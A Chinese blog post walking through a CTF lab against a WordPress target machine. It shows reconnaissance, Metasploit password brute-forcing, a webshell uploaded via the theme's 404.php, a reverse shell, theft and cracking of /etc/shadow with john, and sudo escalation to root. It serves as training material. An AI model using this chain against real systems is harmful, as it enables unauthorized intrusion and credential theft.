CTF-14.web安全暴力破解

最新推荐文章于 2024-06-06 13:36:15 发布
最新推荐文章于 2024-06-06 13:36:15 发布
阅读量832 收藏 1
点赞数
分类专栏: ctf 文章标签: web安全 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/woo233/article/details/127053291
版权

暴力破解漏洞介绍

穷举法的基本思想是根据题目的部分条件确定答案的大致范围,并在此范围内对所有可能的情况逐一验证,直到全部情况验证完毕。若某个情况验证符合题目的全部条件,则为本问题的一个解;若全部情况验证后都不符合题目的全部条件,则本题无解。穷举法也称为枚举法。

Web安全中的暴力破解也是利用尝试所有的可能性最终获取正确的结果。

实验环境

攻击机: kali linux192.168.253.12
靶场机器: ubuntu linux 192.168.253.20

信息探测

扫描主机服务信息以及服务版本
–nmap -sV 靶场IP地址在这里插入图片描述

快速扫描主机全部信息
–nmap -T4 -A -v 靶场IP地址

探测敏感信息
– nikto -host http://靶场IP地址:端口

在这里插入图片描述

分析nmap ,nikto扫描结果,并对结果进行分析,挖掘可以利用的信息; 发现/secret是一个比较敏感的信息
使用浏览器打开http://ip:port/敏感页面,查看敏感信息,找到可利用的位置;
在这里插入图片描述
点击这个箭头后,界面如下所示:
在这里插入图片描述
在点击log in

在这里插入图片描述
在这里插入图片描述
或者,可以在kali中编辑 /etc/hosts
在这里插入图片描述

暴力破解

使用wpscan进行用户名提取
在这里插入图片描述
需要修改ur1
在这里插入图片描述
获取到用户名
在这里插入图片描述

启动Metasploit -> msfconsole

msf > use auxiliary/scanner/http/wordpress_login_enummsf auxiliary(wordpress_login_enum) > set username admin
msf auxiliary(wordpress_login_enum) > set pass_file /usr/share/wordlists/clirb/common.txt
msf auxiliary(wordpress_login_enum) > set targeturi /secret/
msf auxiliary(wordpress_login_enum) > set rhosts 192.168.1.13
msf auxiliary(wordpress_login_enum) > run

使用破解好的密码登录系统
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

登上之后进入后台,上传webshell获取控制权

在这里插入图片描述
wordpress后台寻找上传点
–fwentyteeth的404.php 可以上传webshell
在这里插入图片描述
启动监听
在这里插入图片描述

执行shell,获取反弹shell。

http://靶场IP/wordpress/wp-content/ themes/twentyfourteen/404.php

查看系统信息sysinfo
查看用户权限id

root权限

Metasploit中利用返回shell 下载download /etc/passwd download /etc/ shadow
在这里插入图片描述

–将文件转换为join可以识别的文件格式
unshadow passwd shadow > cracked

–使用john破解密码
john cracked
在这里插入图片描述

su - marlinspike
sudo -l
sudo bash
在这里插入图片描述

获取Flag

一般情况下,靶场机器的flag值是存放在服务器的根目录下,/root/目录。
cd /root/
ls
cat flag

在这里插入图片描述

Writeup测试文档总结文档

总结

提权时可以抓取/etc/passwd和/etc/shadow,之后使用join来破解对应的密码,然后使用对应的用户名密码提升root权限;

对于wp的渗透中,启动对应的主题,然后在404页面上传shell ;

wow2ok
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTF-暴力破解
DUOan0216的博客
10-19 2042
简述 Burte Force(暴力破解)概述 “暴力破解”是一攻击具手段,在web攻击中,一般会使用这种手段对应用系统的认证信息进行获取。 其过程就是使用大量的认证信息在认证接口进行尝试登录,直到得到正确的结果。 为了提高效率,暴力破解一般会使用带有字典的工具来进行自动化操作。 理论上来说,大多数系统都是可以被暴力破解的,只要攻击者有足够强大的计算能力和时间,所以断定一个系统是否存在暴力破解漏洞,...
CTF平台题库writeup(二)--BugKuCTF-WEB(部分)
渗透、攻防、CTF、编程
06-26 4186
web2 flag在源码的注释里 计算器 改一下text文本框的最大输入位数>1即可 web基础$_GET GET方式传参即可 web基础$_POST post方式传参即可 矛盾 $num=$_GET['num']; if(!is_numeric($num)) { echo $num; if($num==1) echo 'flag{**********}'; } 这题要求传参num不能是数字,而且num=1,一开始没有什么思路,认为是弱类型的绕过,传了true进去,发现无效,问
CTF-web暴力破解
IT小学子的博客
05-03 800
web暴力破解 针对wordpress网站 use auxiliary/scanner/http/wordpress_login_enum 为当前wordpress模块 set username admin 网站用户名 set pass_file /usr/share/wordpress/dirb/common.txt 密码字典位置 set targeturl...
《11招玩转网络安全》之第三招:Web暴力破解-Low级别
kgsew的专栏
07-09 1201
Docker中启动LocalDVWA容器,准备DVWA环境。在浏览器地址栏输入http://127.0.0.1,中打开DVWA靶机。自动跳转到了http://127.0.0.1/login.php登录页面。输入默认的用户名密码admin:password登录。单击页面左侧的DVWA Security,进行安全级别设置,如图3-18所示。图3-18  DVWA安全级别DVWA的安全级别有4种,分别为...
ctfshow web web签到--web14
最新发布
2301_81040377的博客
06-06 567
要让回显有用的东西我们不可能回显几万,靶机都没了,所有挨着试。我想手注的,但是不知道为什么没有回显了只能sqlmap了。本来是想直接命令执行的,发现过滤了就用这个来看目录。SQL注入,我之前是没遇到这种格式的长了新姿势。php伪协议,不知道flag文件所以不能用。可以手注空格绕过,但是我的还是没有回显。显然我们不能用正常的SQL注入了。v1必须为字母v2必须为数字。查看源码原来我们的木马太长了。那么我们就需要用特殊的密码。刚好闭合,管理员身份就过了。我们并不知道密码,这里用。访问F12获得查询语句。
CTF Web burpsuite之暴力破解
weixin_43982276的博客
10-07 670
CTF Web burpsuite之暴力破解 burpsuite是一个应用很广的黑客工具 功能也还不错 适合初学者 首先要设置代理 找到proxy里面的option属性 查看默认端口 一般为127.0.0.1:8080 设置浏览器端口与burpsuite一致 找到一个用户名密码在截获之后都为明码的网站(安全属性较低) 随意输入用户名和密码 具体如下 ...
web-ctfctf-pikachu-暴力破解
一个努力生活的人的博客
06-11 2904
文章目录暴力破解(Brute Force)1.基于表单的暴力破解 burpsuite配置 火狐浏览器需要导入证书 如果无法抓到127.0.0.1的包,可以试试以下操作 暴力破解(Brute Force) 1.基于表单的暴力破解 使用burpsuite工具中的intruder模块进行暴力破解:intruder模块使用教程 先随便输入一个username和password 利用burpsuite进行抓包 将抓到的包导入intruder模块(在空白处右键,选择send to intruder)
论剑CTF web-14
m0_46587008的博客
10-25 350
论剑CTF web14(听说备份不少东西呢) 1.题目 2.思路 首先打开网页没有任何响应,先看源码: 说这是一个假的403,你应该是个擅长发现,所以推测网站还有别的页面,这里用dirsearch扫一下 发现/.git 推测是一个git备份文件泄露,接下来使用GitHack获取git备份 这里给个GitHack连接 https://github.com/lijiejie/GitHack !注意dirsearch的环境是Python3,GitHack的运行环境是Python2(也可以去网上找
002-CTF web题理论基础篇-第二课理论基础.pdf
07-09
CTF(Capture The Flag)是一种网络安全竞赛,其中的Web题目主要涉及Web安全领域的知识和技巧。本篇将深入探讨CTF Web题型的基础理论,帮助参赛者理解和掌握解题的关键点。 1. 工具集: 在CTF Web挑战中,通常会...
BugkuCTF-WEB-第43题到第52题
Alita_lxz的博客
11-04 1172
BugkuCTF-WEB-第43题到第52题
ctfshow-web入门-爆破(web26,27,28)
HkD01L的博客
06-20 1058
ctfshow web26 web27 web28
ctf训练 web安全暴力破解
qq_43799246的博客
12-03 1061
ctf训练 web安全暴力破解 暴力破解漏洞介绍 穷举法的基本思想是根据题目的部分条件确定答案的大致范围,并在此范围内对所有可能的情况逐一验证,直到全部情况验证完毕。若某个情况验证符合题目的全部条件,则为本问题的一个解;若全部情况验证后都不符合题目的全部条件,则本题无解。穷举法也称为枚举法。 Web安全中的暴力破解也是利用尝试所有的可能性最终获取正确的结果。 实验环境 一台kail攻击机 和 靶机 靶机镜像:https://pan.baidu.com/s/1jitlWbjJHfyzfvPEBVDhUw 提
CTFshow-web-web14
qq_68581192的博客
11-03 209
发现是get传参,变量是c,c的值进入sleep函数等待,c值越大,等待时间越长。进入switch语句判断,所有的case判断完成后break退出,只有到case 3时,继续到case 6000000,然后echo一个$url,如果我们想看c=6000000的值,就要先构造c=3。访问secret.php文件,虽然没有内容,但是没显示报错,说明文件存在,但是读取方法不对,apache的默认网站根路径是 /var/www/html, 我们试一下读这个文件的内容。利用数据库的文件读写功能读取文件内容。
CTF-Web14(涉及PHP代码审计——不走寻常路的绕过)
→_→
09-02 754
14.程序逻辑问题 分析: 查看源代码: 初了解(可略):mysql_fetch_array() 中可选的第二个参数 result_type 是一个常量,可以接受以下值:MYSQL_ASSOC,MYSQL_NUM 和 MYSQL_BOTH。本特性是 PHP 3.0.7 起新加的。本参数的默认值是 MYSQL_BOTH。如果...
CTF论剑场web题目(持续更新)--WEB14
jiuyongpinyin的博客
07-22 308
web14 打开页面查看源码: 告诉我们“这是一个假的403,你应该善于发现“,其实这并没有什么用,嘿嘿,题目告诉我们“听说备份了不少东西呢”,所以我想到了备份文件泄露,先用工具扫一下: 发现了这个,典型的.git备份文件泄露,所以咱们直接上工具Githack 链接在这: https://github.com/lijiejie/GitHack 扫描完成后出现了这两个文件: 查看flag.php,flag就在里面。 注:萌新第一次写write up,不足之处还请见谅,不对之处欢迎批评指正。 ...
CTF-Web14(有时候源码里面就能不经意间泄露重要(editor)的信息,默认配置害死人)
weixin_47059164的博客
08-22 183
知识点:编辑器漏洞,领导讲话的图片很可能来自于编辑器这个路径,从图片路径找到编辑器路径进行突破。
ctfshow-萌新-web14( 曲线救国-POST请求绕过获取网站敏感信息)_ctfweb14萌新
2301_82101171的博客
04-17 288
2.由于手动将GET请求改成了POST请求, 需要再手动添加 Content-Type: application/x-www-form-urlencoded , 否则将无法正常发送POST请求的参数。而后使用代理工具( Burp Suite)抓包, 在POST请求中传递需要执行的系统命令, 这里需要注意两个地方( 如果使用的是其他工具可以忽略)>来代替分号, 但这样一来就只能执行一行代码, 增加了解题的难度。3.源码中的过滤只针对GET请求的参数, 并未对POST请求的参数做限制, 可以利用这一点搞事情。
ctf.show_web(1-14)wp
qq_73767109的博客
03-28 783
ctf.show_web(1-14) 详细解题思路及部分脚本
https://ctf-wiki.org/
06-01
https://ctf-wiki.org/是一个关于CTF(夺旗赛)的详细介绍网站,内容包括CTF的基础知识、题目类型、工具使用、比赛平台等,是CTF爱好者必备的网站之一。以下是一个简单的介绍网站的例子: 根据https://ctf-wiki.org/网站,我们可以了解关于CTF的基本知识,比如各种题目类型,例如二进制、密码学、Web、逆向分析等等。此外,该网站还提供了一些CTF比赛的平台和工具的介绍,以及CTF比赛中需要掌握的一些技能和经验等等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

wow2ok

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值